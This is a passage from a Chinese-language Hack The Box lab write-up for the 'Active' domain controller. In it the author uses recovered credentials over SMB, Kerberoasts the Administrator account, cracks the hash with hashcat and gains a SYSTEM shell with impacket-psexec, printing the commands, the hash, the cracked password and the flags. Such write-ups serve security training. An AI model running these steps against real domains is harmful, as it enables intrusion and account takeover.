Protocol: N/A 
Provider: MPSSVC.dll 
UUID    : 7F9D11BF-7FB9-436B-A812-B2D50C5D4C03 v1.0 Fw APIs
Bindings: 
          ncalrpc:[LRPC-31485e4410b15e855e]

Protocol: N/A 
Provider: BFE.DLL 
UUID    : DD490425-5325-4565-B774-7E27D6C09C24 v1.0 Base Firewall Engine API
Bindings: 
          ncalrpc:[LRPC-31485e4410b15e855e]

Protocol: N/A 
Provider: N/A 
UUID    : 7F1343FE-50A9-4927-A778-0C5859517BAC v1.0 DfsDs service
Bindings: 
          ncacn_np:\\DC[\PIPE\wkssvc]
          ncalrpc:[DNSResolver]

Protocol: [MS-NRPC]: Netlogon Remote Protocol 
Provider: netlogon.dll 
UUID    : 12345678-1234-ABCD-EF00-01234567CFFB v1.0 
Bindings: 
          ncacn_ip_tcp:10.10.10.100[49158]
          ncacn_http:10.10.10.100[49157]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLE4A09CF1A849D414E9ED4E1CEE73F]
          ncacn_ip_tcp:10.10.10.100[49155]
          ncalrpc:[samss lpc]
          ncalrpc:[dsrole]
          ncacn_np:\\DC[\PIPE\protected_storage]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncalrpc:[LRPC-9c60b710cc00f52bc7]
          ncacn_np:\\DC[\pipe\lsass]

Protocol: [MS-SAMR]: Security Account Manager (SAM) Remote Protocol 
Provider: samsrv.dll 
UUID    : 12345778-1234-ABCD-EF00-0123456789AC v1.0 
Bindings: 
          ncacn_ip_tcp:10.10.10.100[49158]
          ncacn_http:10.10.10.100[49157]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLE4A09CF1A849D414E9ED4E1CEE73F]
          ncacn_ip_tcp:10.10.10.100[49155]
          ncalrpc:[samss lpc]
          ncalrpc:[dsrole]
          ncacn_np:\\DC[\PIPE\protected_storage]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncalrpc:[LRPC-9c60b710cc00f52bc7]
          ncacn_np:\\DC[\pipe\lsass]

Protocol: [MS-LSAT]: Local Security Authority (Translation Methods) Remote 
Provider: lsasrv.dll 
UUID    : 12345778-1234-ABCD-EF00-0123456789AB v0.0 
Bindings: 
          ncacn_http:10.10.10.100[49157]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLE4A09CF1A849D414E9ED4E1CEE73F]
          ncacn_ip_tcp:10.10.10.100[49155]
          ncalrpc:[samss lpc]
          ncalrpc:[dsrole]
          ncacn_np:\\DC[\PIPE\protected_storage]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncalrpc:[LRPC-9c60b710cc00f52bc7]
          ncacn_np:\\DC[\pipe\lsass]

Protocol: [MS-DRSR]: Directory Replication Service (DRS) Remote Protocol 
Provider: ntdsai.dll 
UUID    : E3514235-4B06-11D1-AB04-00C04FC2DCD2 v4.0 MS NT Directory DRS Interface
Bindings: 
          ncacn_http:10.10.10.100[49157]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLE4A09CF1A849D414E9ED4E1CEE73F]
          ncacn_ip_tcp:10.10.10.100[49155]
          ncalrpc:[samss lpc]
          ncalrpc:[dsrole]
          ncacn_np:\\DC[\PIPE\protected_storage]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncalrpc:[LRPC-9c60b710cc00f52bc7]
          ncacn_np:\\DC[\pipe\lsass]

Protocol: N/A 
Provider: spoolsv.exe 
UUID    : 4A452661-8290-4B36-8FBE-7F4093A94978 v1.0 Spooler function endpoint
Bindings: 
          ncalrpc:[spoolss]

Protocol: [MS-PAN]: Print System Asynchronous Notification Protocol 
Provider: spoolsv.exe 
UUID    : AE33069B-A2A8-46EE-A235-DDFD339BE281 v1.0 Spooler base remote object endpoint
Bindings: 
          ncalrpc:[spoolss]

Protocol: [MS-PAN]: Print System Asynchronous Notification Protocol 
Provider: spoolsv.exe 
UUID    : 0B6EDBFA-4A24-4FC6-8A23-942B1ECA65D1 v1.0 Spooler function endpoint
Bindings: 
          ncalrpc:[spoolss]

Protocol: [MS-SCMR]: Service Control Manager Remote Protocol 
Provider: services.exe 
UUID    : 367ABB81-9844-35F1-AD32-98F038001003 v2.0 
Bindings: 
          ncacn_ip_tcp:10.10.10.100[49165]

Protocol: [MS-DNSP]: Domain Name Service (DNS) Server Management 
Provider: dns.exe 
UUID    : 50ABC2A4-574D-40B3-9D66-EE4FD5FBA076 v5.0 
Bindings: 
          ncacn_ip_tcp:10.10.10.100[49170]

Protocol: [MS-RPRN]: Print System Remote Protocol 
Provider: spoolsv.exe 
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0 IPSec Policy agent endpoint
Bindings: 
          ncalrpc:[LRPC-20f5dbf2ea38092089]
          ncacn_ip_tcp:10.10.10.100[49171]

Protocol: [MS-FASP]: Firewall and Advanced Security Protocol 
Provider: FwRemoteSvr.dll 
UUID    : 6B5BDD1E-528C-422C-AF8C-A4079BE4FE48 v1.0 Remote Fw APIs
Bindings: 
          ncacn_ip_tcp:10.10.10.100[49171]

Protocol: [MS-CMPO]: MSDTC Connection Manager: 
Provider: msdtcprx.dll 
UUID    : 906B0CE0-C70B-1067-B317-00DD010662DA v1.0 
Bindings: 
          ncalrpc:[LRPC-320bf429bfff7fae04]
          ncalrpc:[OLED55A94FD74F04190AACC4CAFABEE]
          ncalrpc:[LRPC-16d6d49426bc6db49e]
          ncalrpc:[LRPC-16d6d49426bc6db49e]
          ncalrpc:[LRPC-16d6d49426bc6db49e]
          ncalrpc:[LRPC-16d6d49426bc6db49e]

Protocol: [MS-FRS2]: Distributed File System Replication Protocol 
Provider: dfsrmig.exe 
UUID    : 897E2E5F-93F3-4376-9C9C-FD2277495C27 v1.0 Frs2 Service
Bindings: 
          ncacn_ip_tcp:10.10.10.100[5722]
          ncalrpc:[OLE9573A34B3B1F4146973CF1038961]

[*] Received 154 endpoints.

14、经过查看引导模式,我才知道,这里也是通过SMB去读第一个flag信息的,我这里一直觉得拿到账号密码了,该进入到初始shell环境的,结果各种工具用了一个遍,进不去,没办法只能通过SMB的形式获取到第一个flag信息了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient //10.10.10.100/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Sat Jul 21 22:39:20 2018
  ..                                 DR        0  Sat Jul 21 22:39:20 2018
  Administrator                       D        0  Mon Jul 16 18:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 13:06:44 2009
  Default                           DHR        0  Tue Jul 14 14:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 13:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 12:57:55 2009
  Public                             DR        0  Tue Jul 14 12:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 23:16:32 2018

                5217023 blocks of size 4096. 279064 blocks available
smb: \> get \SVC_TGS\desktop\user.txt
getting file \SVC_TGS\desktop\user.txt of size 34 as \SVC_TGS\desktop\user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> 

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat '\SVC_TGS\desktop\user.txt'
bc50f1c04f9316658fedf875868b336a

0x02 系统权限获取

15、上述获取到的账号是域用户的账号的,这里可以尝试下Kerberoasting攻击

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo impacket-GetUserSPNs -request -dc-ip 10.10.10.100 active.htb/SVC_TGS
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-19 03:06:40.351723  2024-03-15 17:05:11.452955             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$052f2de9d612acac8214e11b3627e17b$d0aad94270fd1d89ddb42da26c4e5d76d091639b8f3cdc9c8f19d8c2cc54ceaf9d45187383d3424b5e412f37ea7a6c034d4faeb4b33aaab60fa2761917045c713c2f79b87d4aa4a48f2da075a454ecde83f0b1cb198528c579b5eba23ac1c5fb593861c891704255bc517f8d1a23560ca5080648d4445b333c823039a90838d35cd0bcc1ef6b0bc33388b7f4cf4513185d26405b95812d2f6f727121e415b85e4d92f22a6eb928d0ecac09161d60236c2a40125cf6252b09bd2217bdb0666d096645282ae813f9235945c5c0728152ba8a3b83f565372de414d0674e9517f5f593764e30e08660e4d88f7eeebb471cca83ac3a179066e95c0d0b772da3e72e31ec8adf99842e429764df3838ca6094df08688551fe00e9289f6c4e7f7101336e77ce7a5ad656ad6918af4e864cb8fab8de98b239364a27578b5837663932b60d3ec4c413252bdc66c248704b28feaf9b573bbff0924d3c5e440bf94d3c63d2ca27b0086d2f1c5bb1fdf1ddf55e9883e236e3163b4d235bc4ec9bcb31160abc017658836942a00eed10fb277e3cd10a8a4945e7c66addad39c429682ce71b3b1997919b96a0800d769ff07b74bb25ea309025b9a8ac8f6f6938db38f37578c8d1e2eb1722b6089c25b5b2ca311deea4c46e8f42db587a452178f61c3b3efd9863e1af7802afa2f123ae70e7bce6408f99c74d1da15f415509c4ffb3ab8db101769965236385f494071dab0b031821500766240333e731c0e8fc49b5e1389431c4ac749edaaed1624a1e82bbcce78be6ff6be3282d9968908b52e541bf74cbd69350eb4e8462308d4f6974eadcf8b57f3edb9c6bca7a9ccaf9704a3244e13c0cb7af13053623401e40520498dcbca88ff89cb61f6c4175976df65931e4e20577ab8ab8b542fdf09f9d0d298cd0e2ab8e4a77986b874b9f5e4210d14758573f9328784ce4e9ee64084a41b01a80bfd09a04409f0ca4dc4914c7120e6fb0420df8df6eefe715c3039eaccaba9c020640ce71e3b8a74f8756bfe17b371d45c07e02ae53c7c3c9f9f76643b75a2fc62ea6f00cea14c155f49801ab229008ad013b2c325af3feabde897c6d3325d090e4e2f6d57f608a4b2ab18ababb0aa6e31cf0498ec1be4b8fa7b35931d98122a5f61a76b9ff9595a6fbf6969b14a910ca88e7f489df716275a587ba7895254eb4ee2b9f942f15046e19742965636733ccca1dc26d1970b004691857cd7abcb8d7a70d943f86cea21b4ddac57c6343

16、一开始获取的账号,账号名字里都带着TGS,不也是暗示进行这个攻击啊

17、下面开始尝试进行密码破解

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿offsec)-[~/Desktop]
└─$ touch Administrator.hash

┌──(kali㉿offsec)-[~/Desktop]
└─$ hashcat -h | grep -i "kerberos"
  19600 | Kerberos 5, etype 17, TGS-REP                              | Network Protocol
  19800 | Kerberos 5, etype 17, Pre-Auth                             | Network Protocol
  28800 | Kerberos 5, etype 17, DB                                   | Network Protocol
  19700 | Kerberos 5, etype 18, TGS-REP                              | Network Protocol
  19900 | Kerberos 5, etype 18, Pre-Auth                             | Network Protocol
  28900 | Kerberos 5, etype 18, DB                                   | Network Protocol
   7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth                      | Network Protocol
  13100 | Kerberos 5, etype 23, TGS-REP                              | Network Protocol
  18200 | Kerberos 5, etype 23, AS-REP                               | Network Protocol

18、成功破解出密码

1
2
3
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hashcat -m 13100 Administrator.hash /usr/share/wordlists/rockyou.txt --show
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$052f2de9d612acac8214e11b3627e17b$d0aad94270fd1d89ddb42da26c4e5d76d091639b8f3cdc9c8f19d8c2cc54ceaf9d45187383d3424b5e412f37ea7a6c034d4faeb4b33aaab60fa2761917045c713c2f79b87d4aa4a48f2da075a454ecde83f0b1cb198528c579b5eba23ac1c5fb593861c891704255bc517f8d1a23560ca5080648d4445b333c823039a90838d35cd0bcc1ef6b0bc33388b7f4cf4513185d26405b95812d2f6f727121e415b85e4d92f22a6eb928d0ecac09161d60236c2a40125cf6252b09bd2217bdb0666d096645282ae813f9235945c5c0728152ba8a3b83f565372de414d0674e9517f5f593764e30e08660e4d88f7eeebb471cca83ac3a179066e95c0d0b772da3e72e31ec8adf99842e429764df3838ca6094df08688551fe00e9289f6c4e7f7101336e77ce7a5ad656ad6918af4e864cb8fab8de98b239364a27578b5837663932b60d3ec4c413252bdc66c248704b28feaf9b573bbff0924d3c5e440bf94d3c63d2ca27b0086d2f1c5bb1fdf1ddf55e9883e236e3163b4d235bc4ec9bcb31160abc017658836942a00eed10fb277e3cd10a8a4945e7c66addad39c429682ce71b3b1997919b96a0800d769ff07b74bb25ea309025b9a8ac8f6f6938db38f37578c8d1e2eb1722b6089c25b5b2ca311deea4c46e8f42db587a452178f61c3b3efd9863e1af7802afa2f123ae70e7bce6408f99c74d1da15f415509c4ffb3ab8db101769965236385f494071dab0b031821500766240333e731c0e8fc49b5e1389431c4ac749edaaed1624a1e82bbcce78be6ff6be3282d9968908b52e541bf74cbd69350eb4e8462308d4f6974eadcf8b57f3edb9c6bca7a9ccaf9704a3244e13c0cb7af13053623401e40520498dcbca88ff89cb61f6c4175976df65931e4e20577ab8ab8b542fdf09f9d0d298cd0e2ab8e4a77986b874b9f5e4210d14758573f9328784ce4e9ee64084a41b01a80bfd09a04409f0ca4dc4914c7120e6fb0420df8df6eefe715c3039eaccaba9c020640ce71e3b8a74f8756bfe17b371d45c07e02ae53c7c3c9f9f76643b75a2fc62ea6f00cea14c155f49801ab229008ad013b2c325af3feabde897c6d3325d090e4e2f6d57f608a4b2ab18ababb0aa6e31cf0498ec1be4b8fa7b35931d98122a5f61a76b9ff9595a6fbf6969b14a910ca88e7f489df716275a587ba7895254eb4ee2b9f942f15046e19742965636733ccca1dc26d1970b004691857cd7abcb8d7a70d943f86cea21b4ddac57c6343:Ticketmaster1968

19、这个账号肯定是高权限的账号,故使用psexec直接拿到最终权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-psexec Administrator@10.10.10.100                    
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file iwdGuZKE.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service TGMI on 10.10.10.100.....
[*] Starting service TGMI.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> cd C:\User\Administrator\Desktop
The system cannot find the path specified.

C:\Windows\system32> cd C:\User\Administrator\
The system cannot find the path specified.

C:\Windows\system32> cd C:\Users\Administrator\Desktop
 
C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 15BB-D59C

 Directory of C:\Users\Administrator\Desktop

[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
21/01/2021  06:49 ��    <DIR>          .

[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
21/01/2021  06:49 ��    <DIR>          ..

[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
15/03/2024  11:05 ��                34 root.txt

               1 File(s)             34 bytes
               2 Dir(s)   1.164.869.632 bytes free

C:\Users\Administrator\Desktop> type root.txt
3307d76b38563708f46138b9d420e2ba

C:\Users\Administrator\Desktop>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/148

打靶记
#shooting-range
Active-htb-writeup
https://sh1yan.top/2024/03/14/Active-htb-writeup/
作者
shiyan
发布于
2024年3月14日
许可协议